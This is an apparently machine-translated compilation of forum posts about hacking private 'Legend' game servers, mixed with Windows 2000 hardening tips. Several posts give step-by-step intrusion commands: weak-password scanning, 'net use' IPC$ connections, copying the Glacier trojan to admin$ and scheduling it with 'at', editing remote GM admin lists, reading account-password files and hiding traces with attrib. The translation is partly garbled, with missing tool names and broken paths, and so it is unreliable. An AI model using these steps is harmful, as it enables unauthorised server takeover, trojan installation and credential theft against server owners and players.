Next I will write about how to hack into the computer first. I am using WINDOWS 2000 SEVER
1 X-SCAN scan IP to see who is a weak password (IP is also very easy to obtain, both are. Weak password means that the user name and password are all system defaults and have not been changed.)
2 Turn on the DOS system and perform the work under DOS!
c:/>net use \\192.168.0.1\ipc$ /user:administrator The administrator user who enters the other computer USER is the administrator user.
It will be easy to deal with after entering, and you can find someone you want to hack! Whether it is GM or destroying and deleting it, for example, GM!
c:/>copy \\192.168.0.1\d$\mirserver\mir200\envir\ are all commands, you can see that the rest of the things you want to change will depend on you, but I have to explain it! ! The purpose of this code is to copy a list of legendary GMs on the D disk, and you can add yourself to edit it!
c:\>edit \\192.168.0.1\d$\mirserver\mir200\envir\
That's all. This is how to use weak passwords to enter the computer! ! Of course there are more ways.
I'm talking about my ** legendary experience of being hacked!
First of all, the mouse moves randomly, and it is obviously controlled by someone. The analysis is as follows: 1. Medium *, 2. Remote control!
Secondly, there is a file-overlapping dialog box, and the computer is suddenly restarted! ! The analysis is as follows: 1. Destroy the system, 2. Control of the legend! 3. Restart is for the hacker settings to take effect!
Again, there were illegal GM manufacturing items to be found. The analysis is as follows: It is for the legend!
Solution: Use antivirus software to prevent viruses, it is best to do it under DOS! 2. There are too many vulnerabilities in 2000. Find useless ports, close 3389, etc., and download the patch of 2000 SP3! Select Local Users in Control Panel and Close GUEST Account in Groups! Close the IUSR (computer name) INTNERNET guest account (my legend is when a hacker uses this account to enter the computer), and modify the super administrator username and password! In addition, the attack legend is mainly GM list, and I have also won. The phenomenon is like this: when I open the file, I didn’t find many GMs. Use CTRL-A to see if there are any extra GMs. In addition, if there are spaces behind the file name you are looking at, and when the files are all displayed, you will find whether there is an additional hidden GM list file. This is also the reason why I have been repeatedly entering the computer and found that there is an illegal GM. It took me 2 hours to attack my computer. I immediately made corresponding modifications to restore the normal operation of the legend. So far, there are still warnings from someone entering my guest account, but I can’t get in! Legend has also entered normal operation!
face=Verdana>Although I have written some methods and solutions for attacking and defending computers, and I think it is a bit contradictory to myself, my purpose is very simple, and I hope it can help you solve your problem! Improve the security of your computer
How to do GM in someone else’s?
Attack elementary teaching
I'm hacking into the method used by someone else's 4f
I saw that some 4fs did well, but they were not very rich and had no equipment when they entered, and there were many experts. I always didn’t like to be a rookie in it, so I went into their server side and made a big fuss. I'm addicted to GM, and now I'll announce the method to everyone. . . .
Actually, the method I use is very simple, with only 4 tools:
(one):
(II) Stream 2000
(3) (In fact, it’s dos from 2000)!
(IV) Glacier 8.4 operating system: win2000 server or winxp system. "": In fact, it is used to search for shared resources online. It is fast and can find many service-breaking common files. However, some IPs cannot be accessed in the browser. This is because they also include IPs for personal Internet access. hehe! Some websites and Internet cafe servers are shared, and some are accessible, but cannot be deleted, because what you are accessing is accessed anonymously, so the permissions are not enough! Some require passwords. What to do if you encounter a password? Use streaming light! Although "Lifting" has restricted 202, there is no restriction on IP, haha! So using streaming IPC detection, create an empty dialogue, find the user list, and then simply detect it first. At this time, some network administrators are lazy and set the administrator too simple. Haha, you can catch it.
What to do next? Maybe when you check the other party's port, you find that the other party has few ports open, such as ftp not opened, what should you do? Glacier! "Gihe", I believe many friends have played with it. Using Gihe to control a server is very fast (because the bandwidth on the server is very large) you can find the location of the other host's homepage in a few minutes. But how to upload and control him? "" is dos under 2000, execute the net command,
The specific operations are as follows:
Step 1: net use \\ip\ipc$ "password" /user:"user" Description: Use a super username to establish a connection to the website you want to hack. Of course, the super user must be in the admin of the website. The "ip" here is the host, "password" is the password of the super user, and "user" is the super user. For example: net use \\210.248.250.2\ipc$ "maozhiie" /user:maozhijie
Step 2: copy \\ip\admin$\system32 Description: It is the remote server side of Glacier. Meaning: Copy this file to the system32 directory in the other party's host winnt. Maybe someone wants to ask the * horses that can be detected when they invade the other party, haha! It is probably OK to install a firewall, but many hosts don’t have the money to buy! Unlike Chinese pirated versions flying all over the sky! If you have the latest *, it's OK! This is the best! ! hey-hey……
Step 3: net time \\ip Check the other party’s server time. Due to the time difference, it should be an hour! Therefore, the server time of the other party must be based on.
Step 4: at \\ip time The time here is the other party’s host time. Function: Execute the procedure at a specified time. For example, at \\210.248.250.2 19:55 Step 5: Glacier can control the computer. I won’t say this, haha! A newbie can also play software.
Then we can control the server.
net use * \\ip\*$ Remote Mapping
Look at this
There is everyone's data in it and it is not encrypted, so everyone can use it
Find access and change it. Change it to a few top-quality ones, such as the 0-80 attack wooden sword, the 0-50 magic hexagonal ring, etc., then it's up to you. But this is too annoying. hehe.
For example, the data format is as follows (all in hexadecimal)
** ** ** ** ce 00 43 12 88 13 01 02 03 04 05 06 07 08 09 00 00 0a
The previous one is the item code, and then 0xce 00 is the weapon code (high position is behind), corresponding to the item db database.
Example: In the item database, the dragon slaying number (idx) is 205, which corresponds to (205+1) and is converted to hexadecimal.
The latter 43 12 is the current persistence, and 88 13 is the maximum persistence.
Example: 43 12 is converted into decimal system to 17170, and the durability is 17
The 01 02 03 behind are attack, magic, and Taoist techniques.
Note that it is added on the basis of the original martial arts.
Example: The dragon slaying above shows attack: 5-36, Taoist art: 0-2, magic: 0-3.
The 04 05 06 07 08 09 behind are the weapons in turn: Luck, curse, accuracy, attack speed, and strength.
The 0x0a followed by the next two empty spaces indicates whether the weapon has been practiced. Specifically
When adding attack to weapons:
Before practice: 00
After practicing: 0a
After the trial is successful: 00, the attack value increases.
I will study jewelry and clothes myself. Many people know this, but I didn’t write it in detail. There are articles on this online, so I don’t need to say more, right?
Then go to the miserver\mud2\logsrv\iddb
There is a person who has everyone's account and password here. You can do it, but stealing someone's account is not a glorious thing. I never do it, but I often use the GM account to reload it. hehe
Here, I will look at the adminlist added to this server while walking. Haha, here is an example, add your name here), and then, we will find the account of gm, and then find the password of this account. OK, OK, use the gm number to enter the game (before entering, please don’t let others discover it, and don’t change their passwords. It’s so bad that you can find it, haha). Call @reloadadmin. Out immediately.
Then, delete the character you added to the adminlist from the adminlist. Okay, go into the game, you are gm, but the real gm won’t see your name from the server side! ! He might be thinking, "What's wrong here? It seems there is still a gm??" Haha, but don’t overdo it, otherwise your permission will be gone if someone reloads it.
At this point, everyone has completed the dream of GM. What I am talking about below is how to remotely control the server host, such as shutting down the machine and restarting it...
I don't know the technology at all. But I still understand a little bit about server security!
Server intrusion mainly depends on account and password. Everyone should first understand what the system account is. What is the system password!
Every other WINDOWS system has its super administrator account and password!
Once these are scanned by hackers, you will get a threat!
1: Understand the meaning of the account
Run CMD first
Then enter: net user (Enter)
After this, an account will be displayed
Check the administrator account again
Enter: net localgroup administrators
This is what the user who looks at the administrators group. In this case, if someone uses the method of hiding the account, it will be found out!
The super administrator account that comes with the system is administrator
Remember to display multiple accounts with unknown accounts here. It proves that your machine is unsafe. If the accounts you appear in are your own accounts. Which forty percent of your machine has not been hacked
Account security:
Two: Password
If you think your account password is 123456, then you will be on your plane within three seconds.
Methods for modifying passwords are safer to modify under DOS
Enter the net user account name and need to change the password (and then press Enter)
Generally, password settings are a little more complicated!
overflow:
IIS will be installed automatically after installing the 2000 server version. If you think IIS is useless, stop it. IIS Address: Start》》》》》》》》》》》》》》》》》》 Management Tools》》 Internet Information Services (this is IIS) You enable it. Press to stop! This will make it even safer. However, if you need to use IIS, remember to use the latest patch SP4.
RPC overflow. Remember, try telnet IP 135 to see if it is open. If it is open. Please apply RPC patch. If not found. Just install a firewall and block the 135 end!
Everyone must remember. The most important thing about intruding the system is to have an account password. Protect your account and password. Safety must belong to you!
Invade the Legend/act as an illegal GM
First of all, I have to declare that I am not writing this article to teach you how to get rid of 4fs, but just want to use this article to attract the attention of the majority of 4f owners and improve their network management level.
I love playing games, but I have a lot of fun and don’t have time to play. I just want to enjoy it. So, when I started playing Legend, I thought it was fun, but playing Shanda was simply suffering, slow upgrade, lacked good equipment, and was bullied everywhere. So, 4f is a wise choice, but when I go in, I don’t have good equipment and I am bullied. Can’t I do gm? Try it, folling me!
Find a lot of 4f IPs and start an x-scan scan. There are quite a few, all of them are weak passwords. These network administrators are really good.
Choose one, 192.168.0.1, go!
Open cmd,
1)c:/>net use 192.168.0.1ipc$ /user:administrator
Connection is successful,
OK, connected, success is in sight,
2)c:/>copy 192.168.0.1d$
The specified file cannot be found.
No? Impossible? Well, it must be hidden, it doesn't matter, come again,
3)c:>attrib -r -h 192.168.0.1d$
No prompt, it succeeded.
This time I don't even need to copy it, just change it.
4)c:>edit 192.168.0.1d$
I will open an interface to see which gm is inside, add it, just remember it yourself, save it after changing it
5)c:>attrib +r +h 192.168.0.1d$
Restore to read-only hide,
OK, the job is done, clean your footprints quickly, don't let people find that they have been invaded,
Now, I'm just waiting for the system to restart. If I can't wait, I'll restart it in the fifth step. But this is too dangerous, so I'd better wait.
Register an account the next day, create a new name added before and enter.
/who
Currently 150 people are online
Ha, I'm just gm. Upgrade yourself quickly.
@level -1
Successfully upgraded, level 255, haha
Recreate the equipment you want, and make whatever you want.
Repeat the above and deleted myself from it. Haha, the good equipment is available and you can play it.
I remember a friend gave a series of explanations on how to strengthen server security, which was explained in detail, but I think there are still many things that need to be supplemented. Microsoft's system is known for vulnerabilities and patches. It is really difficult to configure the server security, and there are too many aspects to consider.
Today I will talk about one aspect first, which can be regarded as a further addition to the previous friends!
What the friend above outlined is mainly the security settings for weak passwords in WIN2000 system! He has already said it very carefully. He has done those, and the password level is almost the same. Indeed, in the era of the Internet, passwords are really very important. I have conducted a series of tests on foreign hosts, and take systems with weak passwords as examples, there are still many more! This also includes many small and medium-sized enterprises' WEB servers, E-MAIL, and PROXY servers with such low-level errors!
If you are doing very carefully in this regard, you should at least carefully study what services are running on your host now, and what these services represent? You should be very clear! Because nowadays, hacking software, * tools, and remote control software are mostly run in your server system in the form of a service, and general firewalls and antivirus software do not reflect any of them. It is rare to find control tools in the form of services, so you must be very familiar with the services you must run on the server. It should be safely set up for unfamiliar or strange services.
Below I will briefly explain the security configuration of WWW (IIS) server in WIN2000. The WWW service is installed by default in WIN2000SERVER, ADSERVER, and DATACENTERSERVER. If you do not need to use the 2000 WWW service, it is recommended not to install it. As for adding/deletion, you can remove its installation in the control panel, or set the WORD WIDE WEB SERVICE startup type to manual/disable in the management tools/services.
In this way, the system will not start the service by default!
If you need to use IIS to build a website and promote your own website, you must configure IIS safely according to the following methods.
In the IIS component, you must first remove SMTP, SNNP, and FTP that you do not need, so that you can reduce the CPU resources and memory usage occupied by your server running. Then you suggest you delete all the contents in your C:\INTERPUB\ directory! Or change the path. Delete the default site in IIS Manager (or delete the virtual directory SCRIPTS) because this directory has writable permissions. In the newly created WEB site, set the permissions of IIS, which must be not written or run. Because IIS supports ASP scripts by default. Then delete unnecessary mappings in IIS, which is very important. If you want to support PHP and CGI scripts, you also have to configure the correct mapping of the application, disable or delete the FSO components (Last year, Shenzhen Window was hacked by others...) If you want to use FSO, it is best to change the name! Otherwise, if you provide someone with the homepage upload, you will definitely be hacked. Be careful!
These should be just an example of server security prevention. To truly achieve the safe operation of the server, you need to spend a lot of time exploring. Because these are enough to deal with some boring... Of course, if you need a WEB server, I still recommend you to use AP. Its source code development, free, and security stability are much better than IIS.